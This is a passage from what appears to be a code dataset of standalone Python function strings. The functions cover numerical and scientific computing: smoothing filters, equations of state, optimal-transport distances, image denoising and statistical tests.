-res1/np.sqrt(2*sample_size+1)\n \n res2 = np.real(np.exp(-1j*x[1])*\\\n sum(-1j*y_obs[k+sample_size]*np.exp(1j*k*x[0]) \\\n for k in range(-sample_size,sample_size+1)))\n res2 = -res2/np.sqrt(2*sample_size+1)\n return np.array([res1, res2])\n \n #% Minimizing f\n \n \"\"\" \n we minimize on [0, 2pi]^2\n \"\"\"\n bnds = ((0, 2*np.pi), (0, 2*np.pi))\n \n \"\"\" \n We begin by a greedy search of the initialization point over a grid of size 126^2\n the initialization point is init\n \"\"\"\n x = y = np.arange(0, 2*np.pi, 0.05)\n steps = 126\n X, Y = np.meshgrid(x, y)\n val = np.array([f([x,y]) for x,y in zip(np.ravel(X), np.ravel(Y))])\n init = np.argmin(val)\n x1 = init%steps\n x2 = (init-x1)/steps\n init = [x1*0.05, x2*0.05]\n \n \"\"\" \n we minimize f...\n \"\"\"\n result = sco.minimize(f, init, method=\"L-BFGS-B\",\\\n jac=grad_f, bounds=bnds, tol=1e-15)\n \n \"\"\" \n (t1,theta1) is the argmax of X(t, theta) and l1=$\\lambda_1$\n \"\"\"\n t1 = result.x[0]\n theta1 = result.x[1]\n l1 = -f([t1,theta1])\n \n \n \"\"\" \n Function g(x) is equal to (X(t1,theta1)-X(x))/(1-rho((t1,theta1)-x))\n \"\"\"\n def g(x):\n a0 = x[0]-t1\n a1 = x[1]-theta1\n N = 2*sample_size+1\n \n vec = np.array([a0,a1])\n r = np.linalg.norm(vec)\n \"\"\" \n the value for r=0 is set to l1 (note that r=0 corresponds to x=(t1,theta1))\n \"\"\" \n res = l1 \n \n if (0<r) & (r<0.00001):\n \"\"\" \n we look a values near (t1,theta1) for which an indetermination occurs\n \"\"\" \n alpha= np.arccos(np.clip(a0/np.sqrt(a0**2+a1**2), -1.0, 1.0))\n u0 = np.cos(alpha)\n u1 = np.sin(alpha)\n \"\"\" \n u0,u1 defines the direction (unit vector)\n \"\"\"\n denom = sum((k*np.cos(alpha)-np.sin(alpha))**2*\\\n (np.sinc((r*(k*np.cos(alpha)-np.sin(alpha)))/(2*np.pi)))**2\\\n for k in range(-sample_size,sample_size+1))/N\n \"\"\" \n denom computes the denominator\n \"\"\"\n \n# \"\"\" \n# We use simpson rule for the numerator\n# \"\"\"\n# h = np.linspace(0,1,500)\n# \n# b0 = t1 + h*a0\n# b1 = theta1 + h*a1\n# \n# value = (1-h)*(u0**2*\\\n# np.real(np.exp(-1j*b1)*sum(-k**2*y_obs[k+sample_size]*np.exp(1j*k*b0) \\\n# for k in range(-sample_size,sample_size+1)))\\\n# +2*u0*u1*\\\n# np.real(np.exp(-1j*b1)*sum(k*y_obs[k+sample_size]*np.exp(1j*k*b0) \\\n# for k in range(-sample_size,sample_size+1)))\\\n# +u1**2*\\\n# np.real(np.exp(-1j*b1)*sum((-1)*y_obs[k+sample_size]*np.exp(1j*k*b0) \\\n# for k in range(-sample_size,sample_size+1)))) \n# value = value/np.sqrt(N)\n# \n# num = sci.simps(value, h)\n \n \"\"\" \n we use a quadrature for the numerator\n \"\"\" \n fun_int = lambda w: (1-w)*(u0**2*\\\n np.real(np.exp(-1j*(theta1+w*a1))*\\\n sum(-k**2*y_obs[k+sample_size]*np.exp(1j*k*(t1+w*a0)) \\\n for k in range(-sample_size,sample_size+1)))\\\n +2*u0*u1*\\\n np.real(np.exp(-1j*(theta1+w*a1))*\\\n sum(k*y_obs[k+sample_size]*np.exp(1j*k*(t1+w*a0)) \\\n for k in range(-sample_size,sample_size+1)))\\\n +u1**2*\\\n np.real(np.exp(-1j*(theta1+w*a1))*\\\n sum((-1)*y_obs[k+sample_size]*np.exp(1j*k*(t1+w*a0)) \\\n for k in range(-sample_size,sample_size+1)))) \n \n num = np.mean(sci.quad(fun_int, 0, 1, epsabs=1e-15, epsrel=1e-15, limit=1000))\n \n res = -num/denom\n \n if (r>=0.00001):\n \"\"\" \n we look a values far (t1,theta1) for which there is no indetermination\n \"\"\" \n res = (l1+f(x))/(1-(np.cos(a1)*dirichlet(a0,N)/N))\n \n return res \n \"\"\" \n we minimize g on [0, 2pi]^2 an dwe llok for the initialization point\n \"\"\"\n val2 = np.array([g([x,y]) for x,y in zip(np.ravel(X), np.ravel(Y))])\n init2 = np.argmin(val2)\n x1 = init2%steps\n x2 = (init2-x1)/steps\n init2 = [x1*0.05, x2*0.05] \n result2 = sco.minimize(g, init2, method=\"L-BFGS-B\", bounds=bnds, tol=1e-15) \n \"\"\" \n argmin of g\n \"\"\"\n t2 = result2.x[0]\n theta2 = result2.x[1] \n \"\"\" \n value of lambda_2\n \"\"\"\n l21 = l1-result2.fun \n a0 = t2-t1\n a1 = theta2-theta1\n N = 2*sample_size+1\n l22 = l1-(l1+f([t2,theta2]))/(1-(np.cos(a1)*dirichlet(a0,N)/N))\n l2 = max(l21,l22)\n \"\"\" \n we compute the statistic\n \"\"\"\n alpha1 = (1/3)*sample_size*(sample_size+1)\n alpha2 = (1/np.sqrt(N))*\\\n sum((k**2-alpha1)*\\\n np.real(y_obs[k+sample_size]*np.exp(1j*(k*t1-theta1))) \\\n for k in range(-sample_size,sample_size+1))\n alpha3 = (1/np.sqrt(N))*sum(k*np.real(y_obs[k+sample_size]*\\\n np.exp(1j*(k*t1-theta1))) for k in range(-sample_size,sample_size+1)) \n stat = (sigma*(alpha1*l1+alpha2)*scs.norm.pdf(l1/sigma)+\\\n (alpha1*sigma**2-alpha3**2)*(1-scs.norm.cdf(l1/sigma)))/\\\n (sigma*(alpha1*l2+alpha2)*scs.norm.pdf(l2/sigma)+\\\n (alpha1*sigma**2-alpha3**2)*(1-scs.norm.cdf(l2/sigma))) \n \n return stat", "def _denoise_tv_chambolle_nd(image, weight=0.1, eps=2.e-4, n_iter_max=200,\n xp=None):\n\n ndim = image.ndim\n p = xp.zeros((image.ndim, ) + image.shape, dtype=image.dtype)\n g = xp.zeros_like(p)\n d = xp.zeros_like(image)\n i = 0\n slices_g = [slice(None), ] * (ndim + 1)\n slices_d = [slice(None), ] * ndim\n slices_p = [slice(None), ] * (ndim + 1)\n while i < n_iter_max:\n if i > 0:\n # d will be the (negative) divergence of p\n d = -p.sum(0)\n for ax in range(ndim):\n slices_d[ax] = slice(1, None)\n slices_p[ax+1] = slice(0, -1)\n slices_p[0] = ax\n d[tuple(slices_d)] += p[tuple(slices_p)]\n slices_d[ax] = slice(None)\n slices_p[ax+1] = slice(None)\n out = image + d\n E = (d * d).sum()\n else:\n out = image\n E = 0.\n\n # g stores the gradients of out along each axis\n # e.g. g[0] is the first order finite difference along axis 0\n for ax in range(ndim):\n slices_g[ax+1] = slice(0, -1)\n slices_g[0] = ax\n if xp == np:\n g[tuple(slices_g)] = xp.diff(out, axis=ax)\n else:\n g[tuple(slices_g)] = diff(out, axis=ax)\n slices_g[ax+1] = slice(None)\n\n norm = (g * g).sum(axis=0, keepdims=True)\n xp.sqrt(norm, out=norm)\n E += weight * norm.sum()\n tau = 1. / (2.*ndim)\n norm *= tau / weight\n norm += 1.\n p -= tau * g\n p /= norm\n E /= float(image.size)\n if i == 0:\n E_init = E\n E_previous = E\n else:\n if abs(E_previous - E) < eps * E_init:\n break\n else:\n E_previous = E\n i += 1\n return out", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn sp.ndimage.convolve1d(data, kernel, axis=2)", "def v_multiplier(self):\n return (4./3)*np.pi*(self.bins[:, 1]/2)**3", "def smooth_ust(u, z):\n z0 = 1e-3\n kappa = 0.4\n nu_air = 1.56e-5\n for i in range(20):\n ust = kappa * u / np.log(z / z0)\n z0 = 0.132 * nu_air / ust\n return ust", "def poisson_sd(data: DataSeries) -> DataSeries:\n return data.pow(0.5)", "def lorentz(self, X, xm, amp, w):\n return amp / (1 + ((X - xm) / (w / 2)) ** 2)", "def perron_term_fn(iteration_count, v, z):\n return -0.5 * z * (v + iteration_count - 0.5) / (\n (v + z + (iteration_count - 1.) / 2.) *\n (v + z + iteration_count / 2.))", "def noise(self):\n # Extract parameters\n pzs = self.params[0]\n ngals = np.array([pz.gals_per_steradian for pz in pzs])\n return 1.0 / ngals", "def murnaghan(p, v):\n return p[0]+p[1]*v/p[2]*((p[3]/v)**p[2]/(p[2]-1)+1)-p[1]*p[3]/(p[2]-1)", "def w(lam, gam, p):\n return np.sqrt((1 - lam*np.cos(2*np.pi*p ) )**2 + (gam*lam*np.sin(2*np.pi*p ) )**2 )", "def silverman(n: int, ess: float) -> float:\n\n return (ess * (n + 2) / 4) ** (-1 / (n + 4))", "def streamwise_smoothing(self, data, its, centre_weight=0.5):\n\n smooth_data_d = self.downhill_smoothing(data, its, centre_weight=centre_weight)\n smooth_data_u = self.uphill_smoothing(data, its, centre_weight=centre_weight)\n\n\n\n return 0.5 * (smooth_data_d + smooth_data_u)", "def smooth(f, g):\r\n chi_f = f.apply(lambda x: 0.0 if pd.isna(x) else 1.0)\r\n f_ext = pd.concat([f, chi_f], axis=1).prod(axis=1)\r\n a = convolve(f_ext, g)\r\n b = convolve(chi_f, g)\r\n return a.div(b)", "def scipy_smooth(img, sigma=5):\n return ndimage.gaussian_filter(img, sigma=sigma)", "def fla (mva, vnom):\r\n x=mva*1000000\r\n y=(vnom*1000)\r\n z=round(x/y,3)\r\n return z", "def g_sebal_func(ts, albedo_sur, ndvi):\n g = np.copy(ndvi).astype(np.float64)\n np.power(g, 4, out=g)\n g *= -0.98\n g += 1\n g *= ts\n g *= (albedo_sur * 0.0074 + 0.0038)\n return g", "def smooth(y, box_pts):\r\n box = np.ones(box_pts)/box_pts\r\n y_smooth = np.convolve(y, box, mode='same')\r\n return y_smooth", "def birch_murnaghan(p, v):\n return p[0]+9.0/16*p[3]*p[1]*( ( (p[3]/v)**(2.0/3)-1 )**3*p[2]+\n ( (p[3]/v)**(2.0/3)-1 )**2*\n ( 6-4*(p[3]/v)**(2.0/3) ) )", "def _lidstone_smooth(prob, smoothing, observations, outcomes):\n return (prob + smoothing) / (observations + (smoothing * outcomes))", "def pvalue_gaussian(self):\n \n pv = 2 * stats.norm.sf(abs(self.TS_prime_obs), loc=0, scale=1)\n return(pv)", "def smooth(img, sigma):\n if sigma < 0:\n raise ValueError('smoothing kernel size is negative')\n elif sigma == 0:\n return img.get_data()\n else:\n sigma_vox = sigma / np.sqrt(np.sum(img.get_affine()[0:3, 0:3] ** 2, 0))\n return nd.gaussian_filter(img.get_data(), sigma_vox)", "def apply_smoothstep(image):\n image_out = 3 * image**2 - 2 * image**3\n return image_out", "def smoothing(data, mask):\n smooth_data = gaussian_filter(data, [2, 2, 2, 0])\n\n Y = smooth_data[mask].T\n\n return Y", "def mw (mva, pf):\r\n x= mva*1000000\r\n y=x*pf/1000000\r\n return y", "def skydiving_iterate(v, t, dt, X, Y):\n return (v + dt*X(t))/(1 + dt*Y(t)*abs(v))", "def find_rsh(v, j):\r\n\r\n zp = sp.where(v[:-1] * v[1:] <= 0)[0][0] #make a list of A[x] * A[x -1] without usinf \"for\" loop in original python.\r\n m = np.polyfit(v[(zp - 5):(zp + 5)], j[(zp -5):(zp + 5)], 1)\r\n return 1/abs(m[0]) * 1000 #[Ohm cm^2]\r", "def spherew(self, x):\r\n # return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]\r\n # s = sum(abs(x))\r\n # return sum((x/s+0)**2) - 1/len(x)\r\n # return sum((x/s)**2) - 1/len(x)\r\n return -0.01*x[0] + abs(x[0])**-2 * sum(x[1:]**2)", "def calc_J():\n return np.random.normal(loc=0, scale=1) #loc means - mean, scale -std", "def do_smooth(d, WT, sample_rate):\n d_smooth = np.zeros(len(d))\n Wt = int(np.ceil(sample_rate*WT))\n for i in range(len(d)-Wt):\n d_smooth[i] = np.mean(d[i: i+Wt])\n d_smooth[0:Wt+100] = np.nan # +100 removes \"edge effects\" at start of f4\n return(d_smooth)", "def wpi(nev,mu):\n return np.sqrt(nev*eV2J**2/(mp*mu*epsilon));", "def smooth(y, box_pts):\n box = np.ones(box_pts) / box_pts\n y_smooth = np.convolve(y, box, mode='same')\n return y_smooth", "def smooth(y, box_pts):\n box = np.ones(box_pts) / box_pts\n y_smooth = np.convolve(y, box, mode='same')\n return y_smooth", "def excess_noise_PDF(y,base_noise,Poisson=False):\n \n y, base_noise = array(y), array(base_noise)\n ymn = mean(y)\n yvar = var(y)\n base_var = base_noise**2\n x_guess = sqrt(yvar - mean(base_var)) if yvar > mean(base_var) else 0.0\n \n def log_like(mn,x_noise,log_norm_fac):\n x_var = x_noise**2\n var = x_var + base_var\n terms = -log(2*pi*var)/2 - (y - mn)**2/2/var\n return sum(terms) + log_norm_fac\n \n #initial pass at a normalization factor - use peak value\n def neg_like(x):\n mn,x_noise= x\n return -log_like(mn,x_noise,0.0)\n result = minimize(neg_like, [ymn,x_guess], method='Nelder-Mead')\n log_norm_fac = result.fun\n mn_pk, x_noise_pk = result.x\n \n def like(mn,x_noise):\n return exp(log_like(mn, x_noise, log_norm_fac))\n \n def xmn_like(xnorm):\n constrained_like = lambda mn: like(mn, xnorm*mn)\n result = quad(constrained_like, mn_pk, inf)[0]\n result += -quad(constrained_like, mn_pk, 0.0)[0]\n return result\n \n xmn_pk = x_noise_pk/mn_pk\n result = minimize(lambda x: -xmn_like(x), xmn_pk, method='Nelder-Mead')\n xmn_pk = result.x[0]\n# f_pk = -result.fun\n if xmn_pk < 0.0: xmn_pk = 0.0\n# width = 1.0/f_pk\n# area = pu.gauss_integrate(xmn_like, xmn_pk, 0.0, inf, sigma_guess=width)\n area = quad(xmn_like, xmn_pk, inf)[0]\n area += -quad(xmn_like, xmn_pk, 0.0)[0]\n pdf = lambda x: xmn_like(x)/area if x >= 0.0 else 0.0\n# if pdf(xmn_pk) <= 0.0: pdb.set_trace()\n return pdf, xmn_pk", "def f4():\n n = 4\n v = np.arange(n)**0.75 * 0.2\n e = (np.arange(n)+1)**0.7 * 1e-1\n\n n = 12\n v = np.arange(n)\n e = np.array([0.1]*n) * 10e-0\n\n print(Sumb(v,e))\n\n f = plt.figure()\n a = f.add_subplot(111)\n\n dx = 0.0001\n x = np.arange(-1,v[-1]+1,dx)\n y = x.copy()\n y[:] = 0.\n for i in range(n):\n yx = lg(x,v[i],e[i])\n a.plot(x,np.exp(yx),label='{:d}'.format(i))\n y += yx\n y = np.exp((y - np.max(y))/n**2)\n y /= np.sum(y) * dx \n a.plot(x,y,label='sum')\n s = np.argsort(y)[::-1]\n ys = np.cumsum(y[s]) * dx\n yi = np.argwhere(ys > 0.682689492137)[0][0]\n print('mean = {:2f}'.format(x[s[0]]))\n print('sigma = {:2f}'.format(yi*dx/2))\n xy = np.ndarray((yi+2,2))\n i0,i1 = min(s[:yi]), max(s[:yi])\n xy[:yi,0] = x[i0:i1+1]\n xy[:yi,1] = y[i0:i1+1]\n xy[yi:,1] = 0\n xy[yi:,0] = x[[i1,i0]]\n a.add_patch(Polygon(xy,fill=True,color='green',ec='none',alpha=0.25))\n \n leg = plt.legend()\n plt.draw()", "def temporal_smooth(s, sample_rate, tau, hwinlen=20):\n\n t = np.arange(-hwinlen, hwinlen+1) / sample_rate\n w = np.exp(-t**2 / tau)\n w /= w.sum()\n return convolve1d(s, w)", "def scaling_factor_epanechnikov( h ):\n h = np.array( h, copy=False).ravel()\n n = len(h)\n s = ( np.pi**(n/2.0) ) / sp.special.gamma( n/2.0 + 1 )\n s = (n/2.0 + 1)/s\n s /= np.product(h)\n return s", "def snRate(self, z):\n res = self.alpha * (1.0 + z)**self.beta \n res *= ((self.cosmo.h / 0.7) **3.) \n return res", "def get_evaporation_latent_heat() -> float:\n theta = 28.0\n return 2500.8 - 2.3668 * theta", "def vol(x):\r\n return pi*(topdia(x)/2000.)**2 * length (x)", "def wind_chill(T_a, v):\r\n return 13.12 + 0.6215*(T_a) - 11.37*(v)**0.16 + 0.3965*(T_a)*(v)**0.16", "def zvalue(value, sigma, mu):\n return (value - mu) / sigma", "def stationary_distribution(self):\n P = self.markov_transition()\n N = len(P)\n I = np.identity(N)\n A = P.T - I # get right-kernel\n pi = null_space(A)\n pi = pi / sum(pi)\n pi = [float(item) for item in pi]\n return pi", "def fgausbg(v,p):\n return np.exp(-0.5 * ((v[0] - p[0]) / p[1])**2) * p[2] + p[3]", "def gradientFn(P, mu, v):\n with torch.no_grad():\n b, m, n = P.size()\n B = P / mu\n hinv = B.flatten(start_dim=-2)\n d1inv = B.sum(-1)[:, 1:].reciprocal() # Remove first element\n d2 = B.sum(-2)\n B = B[:, 1:, :] # Remove top row\n S = -B.transpose(-2, -1).matmul(d1inv.unsqueeze(-1) * B)\n S[:, range(n), range(n)] += d2\n Su = torch.cholesky(S)\n Sinv = torch.zeros_like(S)\n for i in range (b):\n Sinv[i, ...] = torch.cholesky_inverse(Su[i, ...]) # Currently cannot handle batches\n R = -B.matmul(Sinv) * d1inv.unsqueeze(-1)\n Q = -R.matmul(B.transpose(-2, -1) * d1inv.unsqueeze(-2))\n Q[:, range(m - 1), range(m - 1)] += d1inv\n # Build vector-Jacobian product from left to right:\n vHinv = v * hinv # bxmn * bxmn -> bxmn\n # Break vHinv into m blocks of n elements:\n u1 = vHinv.reshape((-1, m, n)).sum(-1)[:, 1:].unsqueeze(-2) # remove first element\n u2 = vHinv.reshape((-1, m, n)).sum(-2).unsqueeze(-2)\n u3 = u1.matmul(Q) + u2.matmul(R.transpose(-2, -1))\n u4 = u1.matmul(R) + u2.matmul(Sinv)\n u5 = u3.expand(-1, n, -1).transpose(-2, -1)+u4.expand(-1, m-1, -1)\n uHinv = torch.cat((u4, u5), dim=-2).flatten(start_dim=-2) * hinv\n gradient = uHinv - vHinv\n return gradient", "def slerp_gaussian(val, low, high):\n offset = norm.cdf(np.zeros_like(low)) # offset is just [0.5, 0.5, ...]\n low_gau_shifted = norm.cdf(low) - offset\n high_gau_shifted = norm.cdf(high) - offset\n circle_lerped_gau = slerp(val, low_gau_shifted, high_gau_shifted)\n epsilon = 0.001\n clipped_sum = np.clip(circle_lerped_gau + offset, epsilon, 1.0 - epsilon)\n result = norm.ppf(clipped_sum)\n return result", "def _smooth(self):\n self.te = self._spline(self.rho_in, self.te_in, self.rho)\n self.ne = self._spline(self.rho_in, self.ne_in, self.rho)\n self.ti = self._spline(self.rho_in, self.ti_in, self.rho)\n self.vt = self._spline(self.rho_in, self.vt_in, self.rho)\n for i in range(self.nion):\n self.ni[i,:]=self._spline(self.rho_in, self.ni_in[i,:], self.rho)\n self._extrapolate()", "def compute_windchill(t,v):\n a = 35.74\n b = 0.6215\n c = 35.75\n d = 0.4275\n v16 = v**0.16\n wci = a+(b*t)-(c*v16)+(d*t*v16)\n return wci", "def vonMises(self):\n s = self.voigt\n return ((1 / 2) * ((s[0] - s[1])**2\n + (s[1] - s[2])**2\n + (s[2] - s[0])**2\n + 6 * (s[3]**2 + s[4]**2 + s[5]**2))) ** (1 / 2)", "def gaussion_smoothing(self,sigma=None):\n print(\"## Gaussian smoothing...\");\n corr_length = self.corr_length\n if sigma is None:\n corr = self.correlation\n oscillation=np.max(np.abs(corr[:-1]-corr[1:]),axis=0)\n peak=np.max(np.abs(corr),axis=0)\n oscillation /= peak\n sigma= corr_length/(5.0*oscillation*len(corr)*self.smooth_tune) # 15.0 has been tuned for many times \n print \"sigma:\"\n print sigma\n for i in np.arange(corr_length):\n self.correlation[i] *= exp(-i*i/(2*sigma*sigma))/(sigma*sqrt(2*pi))", "def s_multiplier(self):\n return 4 * np.pi * (self.bins[:, 1]/2)**2", "def bandwidth(d):\n gz = 2 * gamma(0.5 * (d+1)) / gamma(0.5 * d)\n return 1. / (2. * gz**2)", "def smooth(D, W, smoothing):\n WD = scipy.ndimage.gaussian_filter(W * D, smoothing)\n W = scipy.ndimage.gaussian_filter(W, smoothing)\n D = np.divide(WD, W, out=np.zeros_like(D), where=W > 0)\n return D, W", "def g2dfwhm(img):\n npix = img.shape[0]\n rowCen,colCen = adaptiveCentroid(img,1.1/scale)\n row,col = np.mgrid[0:npix,0:npix]\n row = row - rowCen\n col = col - colCen\n A0,sigmac0 = moments(img)\n sigmar0 = sigmac0\n rho0 = 0.\n B0 = 0.\n p0=np.array([sigmac0,sigmar0,rho0,A0, B0])\n def residualg2d(p,x,y,xc,yc,I):\n sigmax,sigmay,rho,A,B = p\n Ierr = np.sqrt(abs(I))+0.00001 # to avoid those = 0, add a small number \n res = (gaussian2d(x,y,xc,yc,sigmax,sigmay,rho,A,B) - I)/Ierr\n return res.flatten()\n p = leastsq(residualg2d,p0,args=(col,row,colCen,rowCen,img))[0]\n sigmac,sigmar,rho,A,B = p\n Mcc = sigmac**2\n Mrr = sigmar**2\n Mrc = rho**2*Mcc*Mrr\n M20 = Mrr + Mcc\n M22 = complex(Mcc - Mrr,2*Mrc)\n whiskerLength = np.sqrt(np.abs(M22))\n lambdap = 0.5*(M20 + abs(M22))\n lambdam = 0.5*(M20 - abs(M22))\n fwhm_g2d = np.sqrt(2.*np.log(2.))*(np.sqrt(lambdap)+np.sqrt(lambdam))\n #fwhm = np.sqrt(M20/2.)*2.35482*scale\n return A, B, whiskerLength, fwhm_g2d", "def estimate_nb(x,y,smoothing):\n\n raise NotImplementedError", "def smooth_spectrum(wlm, s, wave_min=0, wave_max=0, step=50, exclude_wlm=[[0,0]], order=7, \n weight_fit_median=0.5, plot=False, verbose=False, fig_size=12):\n\n if verbose: print(\"\\n> Computing smooth spectrum...\")\n\n if wave_min == 0 : wave_min = wlm[0]\n if wave_max == 0 : wave_max = wlm[-1]\n \n running_wave = [] \n running_step_median = []\n cuts=np.int( (wave_max - wave_min) /step)\n \n exclude = 0 \n corte_index=-1\n for corte in range(cuts+1):\n next_wave= wave_min+step*corte\n if next_wave < wave_max:\n if next_wave > exclude_wlm[exclude][0] and next_wave < exclude_wlm[exclude][1]:\n if verbose: print(\" Skipping \",next_wave, \" as it is in the exclusion range [\",exclude_wlm[exclude][0],\",\",exclude_wlm[exclude][1],\"]\") \n\n else:\n corte_index=corte_index+1\n running_wave.append (next_wave)\n region = np.where((wlm > running_wave[corte_index]-step/2) & (wlm < running_wave[corte_index]+step/2)) \n running_step_median.append (np.nanmedian(s[region]) )\n if next_wave > exclude_wlm[exclude][1]:\n exclude = exclude + 1\n #if verbose and exclude_wlm[0] != [0,0] : print \"--- End exclusion range \",exclude \n if exclude == len(exclude_wlm) : exclude = len(exclude_wlm)-1 \n \n running_wave.append (wave_max)\n region = np.where((wlm > wave_max-step) & (wlm < wave_max+0.1))\n running_step_median.append (np.nanmedian(s[region]) )\n \n # Check not nan\n _running_wave_=[]\n _running_step_median_=[]\n for i in range(len(running_wave)):\n if np.isnan(running_step_median[i]):\n if verbose: print(\" There is a nan in \",running_wave[i])\n else:\n _running_wave_.append (running_wave[i])\n _running_step_median_.append (running_step_median[i])\n \n fit = np.polyfit(_running_wave_, _running_step_median_, order)\n pfit = np.poly1d(fit)\n fit_median = pfit(wlm)\n \n interpolated_continuum_smooth = interpolate.splrep(_running_wave_, _running_step_median_, s=0.02)\n fit_median_interpolated = interpolate.splev(wlm, interpolated_continuum_smooth, der=0)\n \n if plot: \n plt.figure(figsize=(fig_size, fig_size/2.5)) \n plt.plot(wlm,s, alpha=0.5)\n plt.plot(running_wave,running_step_median, \"+\", ms=15, mew=3)\n plt.plot(wlm, fit_median, label=\"fit median\")\n plt.plot(wlm, fit_median_interpolated, label=\"fit median_interp\")\n plt.plot(wlm, weight_fit_median*fit_median + (1-weight_fit_median)*fit_median_interpolated, label=\"weighted\")\n #extra_display = (np.nanmax(fit_median)-np.nanmin(fit_median)) / 10\n #plt.ylim(np.nanmin(fit_median)-extra_display, np.nanmax(fit_median)+extra_display)\n ymin = np.nanpercentile(s,1)\n ymax= np.nanpercentile(s,99)\n rango = (ymax-ymin)\n ymin = ymin - rango/10.\n ymax = ymax + rango/10. \n plt.ylim(ymin,ymax)\n plt.xlim(wlm[0]-10, wlm[-1]+10)\n plt.minorticks_on()\n plt.legend(frameon=False, loc=1, ncol=1)\n\n plt.axvline(x=wave_min, color='k', linestyle='--')\n plt.axvline(x=wave_max, color='k', linestyle='--')\n\n plt.xlabel(\"Wavelength [$\\mathrm{\\AA}$]\")\n \n if exclude_wlm[0][0] != 0:\n for i in range(len(exclude_wlm)):\n plt.axvspan(exclude_wlm[i][0], exclude_wlm[i][1], color='r', alpha=0.1) \n plt.show()\n plt.close()\n print(' Weights for getting smooth spectrum: fit_median =',weight_fit_median,' fit_median_interpolated =',(1-weight_fit_median))\n\n return weight_fit_median*fit_median + (1-weight_fit_median)*fit_median_interpolated # (fit_median+fit_median_interpolated)/2 # Decide if fit_median or fit_median_interpolated", "def wasserstein(X,t,p,lam=10,its=10,sq=False,backpropT=False):\n\n it = torch.where(t > 0)[0] # getting the positions\n ic = torch.where(t < 1)[0]\n\n Xt = torch.index_select(X, 0, it) # Getting the nx100 for each value\n Xc = torch.index_select(X, 0, ic)\n\n nc = Xc.shape[0]\n nt = Xt.shape[0]\n\n ''' Compute distance matrix'''\n if sq:\n M = pdist2sq(Xt,Xc)\n else:\n M = safe_sqrt(pdist2sq(Xt,Xc))\n\n ''' Estimate lambda and delta '''\n M_mean = torch.mean(M)\n M_drop = torch.nn.Dropout(10/(nc*nt))(M)\n delta = torch.max(M)\n eff_lam = lam/M_mean\n\n ''' Compute new distance matrix '''\n Mt = M\n row = delta*torch.ones(M.shape[1])\n col = torch.cat((delta*torch.ones(M.shape[0]),torch.zeros((1))),0)\n Mt = torch.cat((M, torch.unsqueeze(row, 0)), 0)\n Mt = torch.cat((Mt, torch.unsqueeze(col, 1)), 1)\n\n ''' Compute marginal vectors '''\n temp = torch.where(t > 0)[0].shape\n a = torch.cat((p * torch.ones((torch.where(t > 0)[0].shape[0],1)) / nt, (1 - p) * torch.ones((1,1))), 0)\n b = torch.cat(((1-p) * torch.ones((torch.where(t < 1)[0].shape[0],1)) / nc, p * torch.ones((1,1))), 0)\n\n ''' Compute kernel matrix'''\n Mlam = eff_lam*Mt\n K = torch.exp(-Mlam) + 1e-6 # added constant to avoid nan\n U = K*Mt\n ainvK = K/a\n\n u = a\n for i in range(0,its):\n temp = torch.transpose(torch.matmul(torch.transpose(u,0,1),K),0,1)\n u = 1.0/(torch.matmul(ainvK,( b / temp)))\n temp = torch.transpose(torch.matmul(torch.transpose(u,0,1),K),0,1)\n v = b/(temp)\n\n T = u*(torch.transpose(v,0,1)*K)\n\n E = T*Mt\n D = 2*torch.sum(E)\n\n return D, Mlam", "def smooth(self):\n minimal = np.median(self.pheromone_matrix[self.pheromone_matrix > -inf])\n maxim = np.max(self.pheromone_matrix)\n self.pheromone_matrix[self.pheromone_matrix == maxim] = minimal * np.log(maxim/minimal)", "def myTwistFunctionAirliner(Epsilon):\n return -(6.53*Epsilon*Epsilon - 14.1*Epsilon + 4.24)", "def overturning_streamfunction(v, dz, dx):\n if len(v.shape)!=3:\n raise Exception(\"v dim !=3\")\n\n #integrate over longitude\n vint=(v.transpose((0,2,1))*dx).transpose((0,2,1))\n vint=vint.sum(axis=0)\n\n #depth integration\n vint=(vint*dz).cumsum(axis=-1)\n\n psim=numpy.zeros( (v.shape[1], v.shape[2]+1))*vint[0,0]\n psim[:,1:]=-vint\n\n return psim", "def wr(x,y,xcen,ycen,sigma):\n res=np.exp(-((x-xcen)**2+(y-ycen)**2)/(2.*sigma**2))/(2.*np.pi*sigma**2) \n return res", "def gauss_term_fn(iteration_count, v, z):\n return tf.math.square(z) / 4. / (\n (v + iteration_count - 1) * (v + iteration_count))", "def SE(H, W):\n\n no_real, N, N, K, M = H.shape\n all_powers = np.swapaxes(np.swapaxes(H, 0, 1) @ hermitian(W), 0, 1)\n all_powers = np.abs(all_powers) ** 2\n\n\n\n # (no_real, N, N, K, K)\n # (no_real, n_t, n, k, k_neighbor)\n # the power coming from BS n_t to User k in BS n, using the\n # precoding of BS n_t to user k_neighbor in BS n1\n\n\n p_sig = np.zeros((no_real, N, K))\n p_int = np.zeros((no_real, N, K, N))\n sinr = np.zeros_like(p_sig)\n\n\n for r in range(no_real):\n for n in range(N):\n for k in range(K):\n p_sig[r, n, k] = all_powers[r, n, n, k, k]\n for n_t in range(N):\n p_int[r, n, k, n_t] = all_powers[r, n_t, n, k].sum()\n if n_t == n:\n p_int[r, n, k, n_t] -= p_sig[r,n,k]\n sinr = p_sig / ((p_int).sum(axis=-1) + 1)\n return np.log2(1 + sinr), p_sig, p_int", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def lerp_gaussian(val, low, high):\n low_gau = norm.cdf(low)\n high_gau = norm.cdf(high)\n lerped_gau = lerp(val, low_gau, high_gau)\n return norm.ppf(lerped_gau)", "def sinkhorn_log(mu,nu,c,epsilon, \n options={'niter':1000, 'tau':-0.5, 'rho':np.inf}):\n\n for key,val in zip(['tau','rho','niter'],[-.5,np.inf,500]):\n options.setdefault(key, val)\n rho,tau,niter = options['rho'],options['tau'],options['niter']\n\n lam = rho/(rho+epsilon)\n if rho==np.inf:\n lam=1.0\n\n H1 = np.ones_like(mu)\n H2 = np.ones_like(nu)\n\n ave = lambda tau, u, u1: tau*u+(1-tau)*u1\n\n lse = lambda A: np.log(np.sum(np.exp(A),axis=1))\n M = lambda u,v:(-c+u[:,np.newaxis]@H2[np.newaxis,:] + H1[:,np.newaxis]@v[np.newaxis,:] )/epsilon\n\n # kullback divergence\n H = lambda p: -np.sum( 